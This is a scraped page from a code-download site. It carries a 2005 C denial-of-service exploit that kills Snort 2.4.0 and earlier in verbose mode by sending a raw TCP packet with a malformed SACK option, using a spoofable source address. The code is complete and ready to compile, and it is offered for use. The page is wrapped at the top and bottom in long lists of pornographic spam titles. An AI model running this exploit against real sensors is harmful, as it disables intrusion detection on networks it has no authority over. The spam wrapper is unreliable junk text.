亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? snort 小等 2.4.0 sack tcp option handling remote denial of service exploit.txt

?? 一些可以實現益出的程序
?? TXT
字號:
/*_----------------------------------------------
||------+ Snort <= 2.4.0 Trigger p0c +-------
||___________________________________
||--=[ nitrous [at] vulnfact [dot] com ]=--
||--=[ VulnFact Security Labs ]=--
||--=[ 21 Ago 2oo5 ]=--
||--=[ Mexico ]=--
||__________________________________________
-__________________________________________-

Snort <= 2.4.0 SACK TCP Option Error Handling
Este c骴igo envia al especificado un paquete TCP/IP con 4 bytes extras
correspondientes al campo TCP Options [TCP Header].
Estos 4 bytes son "\x05\x02\x00\x00". NOTA !!!: Snort solamente cae cuando se
esta corriendo en verbose mode (-v).

Esto solo funciona testeando de una maquina a otra directamente conectadas
(1 solo salto; Ej. En una red LAN de PC a PC). No funciona desde Internet, por
que el campo TCP->th_sum es 0 (cero), por lo tanto, el primer Router por donde
pase este paquete lo descartara por no tener una checksum valida.

RFC #1072 - TCP Extensions for Long-Delay Paths

3.2- TCP SACK Option:
...
Kind: 5
Length: Variable
+--------+--------+--------+--------+--------+--------+
| Kind=5 | Length | Relative Origin | Block Size |
+--------+--------+--------+--------+--------+--------+

Analizando el packete con 'tcpdump' en OpenBSD 3.5 vemos:
11:17:53.093264 ip: 127.0.0.1.29383 > 127.0.0.1.80: S 213975407:213975407(0) win 5840
<malformed sack [len 0] ,eol>
0000: 4500 002c bc4f 0000 ff06 017a 7f00 0001 E..,艗O..每..z....
0010: 7f00 0001 72c7 0050 0cc1 016f 43f1 8422 ....r脟.P.脕.oC帽."
0020: 6002 16d0 3caf 0000 0502 0000 `..脨<爐......

Testeado en:
[+] snort 2.4.0 @ OpenBSD 3.7 GENERIC // Yeah ;)
[+] snort 2.4.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.3.2 @ Debian Linux 3.1 "Sarge"
[+] snort 2.3.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.3.0 @ Red Hat Linux 9
[+] snort 2.2.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.0.0 @ OpenBSD 3.5 GENERIC

Saludos a vulnfact.com, CRAc, stacked, ran, dex, benn, beck, zlotan, Rowter, Gus, Crypkey,
protoloco, Falckon, dymitri, #cum ppl, warlord/nologin.org por fuzzball2 fuzzer, gcarrillog,
JSS, y en especial a Mariit@ ( Sexy Colombiana ;) ). A la musica de "Sussie 4" ;)...
Federico L. Bossi Bonin
*/

#include<stdio.h>
#include<string.h>
#include<unistd.h>
#include<errno.h>
#include<netdb.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
//#define __USE_BSD 1 /* Use BSD's ip header style */
#include<netinet/ip.h>
#define __FAVOR_BSD 1 /* Use BSD's tcp header style */
#include<netinet/tcp.h>

#define IPSIZE sizeof(struct ip)
#define TCPSIZE sizeof(struct tcphdr)
#define DEFAULT_SRC_IP "200.31.33.70"

char trigger[] = "\x05\x02\x00\x00"; /* Malformed SACK TCP Option */

int usage(char *name)
{
fprintf(stderr, "Usage: %s <target> [spoofed srcip]\n", name);
fprintf(stderr, "\t\tDefault srcip = %s\n", DEFAULT_SRC_IP);

return 0;
}

int main(int argc, char **argv)
{
char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4);
char *srcip = DEFAULT_SRC_IP;
int sockfd, count;
int one = 1; /* setsockopt() */
struct sockaddr_in target;
struct hostent *host2ip;
struct ip *IP = (struct ip *) packet;
struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE);

if(argc < 2)
return(usage(*argv));

if(argc == 3)
srcip = argv[2];

if((host2ip = gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(-1);
}

if(getuid() != 0){
fprintf(stderr, "Ups!, must be r00t to perform RAW sockets\n");
exit(-1);
}

memset(packet, 0x00, sizeof(packet));

memset(&target, 0x00, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(64876);
target.sin_addr = *((struct in_addr *)host2ip->h_addr);

/*** BUILDING MALFORMED PACKET ***/
IP->ip_hl = 0x05;
IP->ip_v = 0x04;
IP->ip_tos = 0x00;
IP->ip_len = IPSIZE + TCPSIZE + 4;
IP->ip_id = 0x00;
IP->ip_off = 0x00;
IP->ip_ttl = 0xff;
IP->ip_p = IPPROTO_TCP;
IP->ip_sum = 0x00;
IP->ip_src.s_addr = inet_addr(srcip);
IP->ip_dst.s_addr = target.sin_addr.s_addr;

TCP->th_sport = htons(31337);
TCP->th_dport = target.sin_port;
TCP->th_seq = 0x00;
TCP->th_ack = 0x00;
TCP->th_x2 = 0x00;
TCP->th_off = 0x06;
TCP->th_flags = 0x00; /* NO Syn ;) */
TCP->th_win = htons(0xffff);
TCP->th_sum = 0x00;
TCP->th_urp = 0x00;

memcpy(packet + IPSIZE + TCPSIZE, trigger, 4);
/*** END ***/

if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){
perror("socket");
exit(-1);
}

if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){
perror("setsockopt");
exit(-1);
}

printf("-=[ Snort <= 2.4.0 Trigger p0c\n");
printf("-=[ By nitr0us <nitrous[at]vulnfact[dot]com>\n\n");
printf("-=[ Sending Malformed TCP/IP Packet...\n");

if((count = sendto(sockfd, packet, IP->ip_len, 0, (struct sockaddr *)&target, sizeof(target))) == -1){
perror("sendto");
close(sockfd);
exit(-1);
}

printf("-=[ Sent %d bytes to %s\n", count, argv[1]);
printf("-=[ Snort killed !\n");

close(sockfd);
return 0;
}


?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
成人免费观看视频| 亚洲国产高清不卡| 欧美日本不卡视频| 欧美日韩亚州综合| 欧美在线播放高清精品| 91在线视频播放| aaa欧美大片| 91丨porny丨中文| 91看片淫黄大片一级在线观看| 成人美女在线观看| www.66久久| 色哟哟在线观看一区二区三区| 91视频观看免费| 色欧美日韩亚洲| 欧美日韩国产成人在线免费| 69精品人人人人| 日韩久久久久久| 久久久亚洲精华液精华液精华液| 久久久99精品免费观看| 日本一区二区三区在线不卡| 欧美国产日韩一二三区| 自拍偷拍亚洲激情| 性久久久久久久久| 欧美aaaaaa午夜精品| 国产一区二区三区免费播放| 国产成都精品91一区二区三| 91小视频免费观看| 欧美日韩精品一区二区| 精品久久久久久久久久久久久久久久久| 久久久亚洲精华液精华液精华液| 国产精品三级电影| 亚洲国产精品久久久久婷婷884| 午夜精品久久久久久久99樱桃| 琪琪一区二区三区| 国产不卡免费视频| 欧美性色综合网| 精品欧美一区二区三区精品久久 | 7777精品伊人久久久大香线蕉的 | 国产精品18久久久久久久久久久久| 成人毛片在线观看| 欧美日韩综合一区| 久久美女高清视频| 夜夜嗨av一区二区三区四季av| 久久精品国产免费| 91蝌蚪porny| 欧美成人猛片aaaaaaa| 国产精品电影院| 天堂va蜜桃一区二区三区| 国产成人精品午夜视频免费| 91在线精品一区二区三区| 91精品国产高清一区二区三区| 久久欧美中文字幕| 亚洲成av人影院| 高清在线观看日韩| 91精品久久久久久久99蜜桃| 国产精品久久久久三级| 日韩激情中文字幕| 91一区二区三区在线播放| 欧美一区二区三区免费视频| 中文字幕第一页久久| 免费人成精品欧美精品 | 精品国产乱码久久久久久图片| 国产精品久久久久9999吃药| 日韩成人av影视| 99热99精品| 久久一区二区三区四区| 午夜精品久久久久久久| 成人高清视频在线| 26uuu色噜噜精品一区二区| 一区二区激情小说| 成人小视频免费在线观看| 日韩欧美国产一二三区| 亚洲一区二区视频| av电影一区二区| wwwwww.欧美系列| 日韩制服丝袜av| 欧美在线小视频| 国产精品国产三级国产普通话99| 久久99精品久久久久婷婷| 欧美日韩五月天| 亚洲精品乱码久久久久久久久| 国产成人精品免费视频网站| 日韩一区二区视频| 亚欧色一区w666天堂| 91在线观看一区二区| 国产拍揄自揄精品视频麻豆| 精品一区二区三区蜜桃| 欧美一激情一区二区三区| 亚洲成人自拍一区| 欧美色图片你懂的| 亚洲精品视频观看| 日本高清成人免费播放| 综合网在线视频| 欧美日韩中文国产| 亚洲欧美另类小说| 成人h精品动漫一区二区三区| 久久在线观看免费| 国产一区日韩二区欧美三区| 91精品国产综合久久香蕉的特点 | 国产在线精品视频| 日韩欧美成人午夜| 日韩电影一区二区三区| 欧美精品一级二级| 日本欧美韩国一区三区| 欧美一级高清片| 毛片av一区二区三区| 日韩欧美亚洲国产另类| 精品系列免费在线观看| 欧美一卡二卡三卡| 精品一区二区久久| 久久久久久久综合狠狠综合| 国产一区二区调教| 欧美激情在线一区二区| av资源网一区| 亚洲一级二级在线| 制服丝袜亚洲网站| 精品在线亚洲视频| 欧美激情综合五月色丁香| 91视视频在线观看入口直接观看www | 成人免费黄色大片| 亚洲天堂久久久久久久| 色94色欧美sute亚洲13| 亚洲va韩国va欧美va| 日韩丝袜情趣美女图片| 国产一区二区三区在线观看免费| 国产欧美一区在线| 日本丶国产丶欧美色综合| 日韩高清在线观看| 久久精品夜色噜噜亚洲a∨| 成人av片在线观看| 亚洲综合视频在线| 欧美成人在线直播| 国产高清精品久久久久| 亚洲另类春色校园小说| 91精品国产综合久久久蜜臀图片| 久久精品国产秦先生| 国产精品进线69影院| 在线亚洲欧美专区二区| 视频一区国产视频| 久久久亚洲国产美女国产盗摄| av在线不卡电影| 天堂久久一区二区三区| 欧美韩国日本不卡| 欧美日本乱大交xxxxx| 国产馆精品极品| 亚洲福利一二三区| 国产欧美日韩在线| 欧美日韩国产综合久久| 高清在线成人网| 日韩中文字幕区一区有砖一区 | 免费看日韩精品| 亚洲欧美在线视频| 91精品国产品国语在线不卡| 国产成人亚洲综合a∨猫咪| 亚洲国产精品一区二区久久恐怖片| 亚洲精品一区二区三区香蕉| 色先锋aa成人| 国模套图日韩精品一区二区| 亚洲青青青在线视频| 日韩欧美激情在线| 日本二三区不卡| 国产成人亚洲综合a∨婷婷| 日韩中文字幕av电影| 中文字幕一区二区三区精华液 | 91精品国产黑色紧身裤美女| www.欧美精品一二区| 久久精品国产99国产| 亚洲综合成人在线| 欧美韩日一区二区三区四区| 欧美一区二区三区视频免费播放 | 日本高清免费不卡视频| 国产精品88888| 蜜桃精品在线观看| 亚洲成人你懂的| 亚洲欧美另类小说视频| 日本一区二区成人| 日韩免费视频一区二区| 欧美三级电影在线观看| 91麻豆123| 成人av在线网| 国模一区二区三区白浆| 免费xxxx性欧美18vr| 亚洲成人激情自拍| 亚洲另类色综合网站| 国产精品久久三区| 国产日韩欧美激情| 精品国产免费人成在线观看| 制服丝袜在线91| 欧美精品久久天天躁| 色999日韩国产欧美一区二区| www..com久久爱| 成年人网站91| 大陆成人av片| 国产老妇另类xxxxx| 久久国产精品第一页| 理论片日本一区| 日韩国产一二三区| 青青国产91久久久久久| 免费看欧美女人艹b| 久久国内精品视频|